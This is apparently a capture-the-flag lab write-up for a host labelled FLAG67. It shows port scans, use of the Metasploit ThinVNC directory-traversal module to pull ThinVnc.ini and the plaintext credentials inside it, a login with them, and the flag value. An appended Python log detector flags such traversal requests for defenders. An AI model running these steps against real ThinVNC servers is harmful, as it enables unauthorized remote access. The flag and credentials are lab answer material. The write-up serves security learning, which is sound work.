FLAG67

2971f3459fe55db1237aad5e0f0a259a41633962

Enumeration

rustscan -a 10.150.150.69
PORT      STATE SERVICE       REASON
445/tcp   open  microsoft-ds  syn-ack
3389/tcp  open  ms-wbt-server syn-ack
5040/tcp  open  unknown       syn-ack
49664/tcp open  unknown       syn-ack
49665/tcp open  unknown       syn-ack
49666/tcp open  unknown       syn-ack
49667/tcp open  unknown       syn-ack
49668/tcp open  unknown       syn-ack
49669/tcp open  unknown       syn-ack
49670/tcp open  unknown       syn-ack
50417/tcp open  unknown       syn-ack
60000/tcp open  unknown       syn-ack

An unusual service is listening on port 60000, so run a script and version scan against it:

nmap -sC -sV 10.150.150.69 -p 60000
PORT      STATE SERVICE VERSION
60000/tcp open  unknown
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 404 Not Found
|     Content-Type: text/html
|     Content-Length: 177
|     Connection: Keep-Alive
|     <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>404 Not Found</H1>The requested URL nice%20ports%2C/Tri%6Eity.txt%2ebak was not found on this server.<P></BODY></HTML>
|   GetRequest: 
|     HTTP/1.1 401 Access Denied
|     Content-Type: text/html
|     Content-Length: 144
|     Connection: Keep-Alive
|     WWW-Authenticate: Digest realm="ThinVNC", qop="auth", nonce="W9BAogLF5UDo3EcCAsXlQA==", opaque="m2yqFi2usv3AY2yatYSTRmyNPAplB8C1oC"
|_    <HTML><HEAD><TITLE>401 Access Denied</TITLE></HEAD><BODY><H1>401 Access Denied</H1>The requested URL requires authorization.<P></BODY></HTML>
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at <https://nmap.org/cgi-bin/submit.cgi?new-service> :

Exploitation

Using Metasploit

msfconsole

msf6 > search thinvnc
msf6 > use auxiliary/scanner/http/thinvnc_traversal

msf6 auxiliary(scanner/http/thinvnc_traversal) > set rhosts 10.150.150.69
msf6 auxiliary(scanner/http/thinvnc_traversal) > set rport 60000

msf6 auxiliary(scanner/http/thinvnc_traversal) > run
[+] File ThinVnc.ini saved in: /home/zyaire/.msf4/loot/20220123173218_default_10.150.150.69_thinvnc.traversa_144924.txt
[+] Found credentials: desperado:TooComplicatedToGuessMeAhahahahahahahh
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Using Burp Suite Repeater

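ThinVNC keeps its settings in an .ini file (ThinVnc.ini, as the Metasploit loot above shows), so the same file can be read through the LFI by hand in Repeater.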


**desperado**:**TooComplicatedToGuessMeAhahahahahahahh**
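
Added example (not part of the original write-up): a small detector a defender could run over HTTP request logs, for instance from a proxy in front of ThinVNC, to flag traversal requests for ThinVnc.ini and whether the server answered them. The log format, the sample lines and all function names are assumptions made for this illustration.

```python
import re
from urllib.parse import unquote

# Constructed log lines in a simplified access-log shape (assumed format).
SAMPLE_LOG = [
    '10.0.0.5 "GET /index.html HTTP/1.1" 200',
    '10.0.0.9 "GET /x/../../ThinVnc.ini HTTP/1.1" 200',
    '10.0.0.9 "GET /x/%2e%2e/%2e%2e/ThinVnc.ini HTTP/1.1" 200',
    '10.0.0.9 "GET /x/%252e%252e%255c..%255cthinvnc.INI HTTP/1.1" 404',
    '10.0.0.7 "GET /docs/v1..2/notes.txt HTTP/1.1" 200',
]

REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def fully_decode(target, max_rounds=5):
    """Percent-decode repeatedly so double-encoded dots and slashes are exposed."""
    for _ in range(max_rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target

def classify(line):
    """Return findings for one log line ([] if clean, None if unparseable)."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    path = fully_decode(m["target"].split("?", 1)[0]).replace("\\", "/")
    segments = path.split("/")
    findings = []
    if ".." in segments:                       # whole-segment match, not substring
        findings.append("traversal")
    if segments[-1].lower() == "thinvnc.ini":  # config file holding the credentials
        findings.append("config-file")
    if findings and m["status"] == "200":      # the server answered with content
        findings.append("served")
    return findings

def scan(lines):
    """Return (line_number, findings) for every line that needs review."""
    hits = []
    for number, line in enumerate(lines, start=1):
        findings = classify(line)
        if findings:
            hits.append((number, findings))
    return hits

if __name__ == "__main__":
    for number, findings in scan(SAMPLE_LOG):
        print(number, ",".join(findings))
```

A hit tagged "served" means the file was returned, so the credentials stored in it should be treated as exposed and rotated.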

Go to http://10.150.150.69:60000/ and enter the credentials


Getting FLAG67.txt

2971f3459fe55db1237aad5e0f0a259a41633962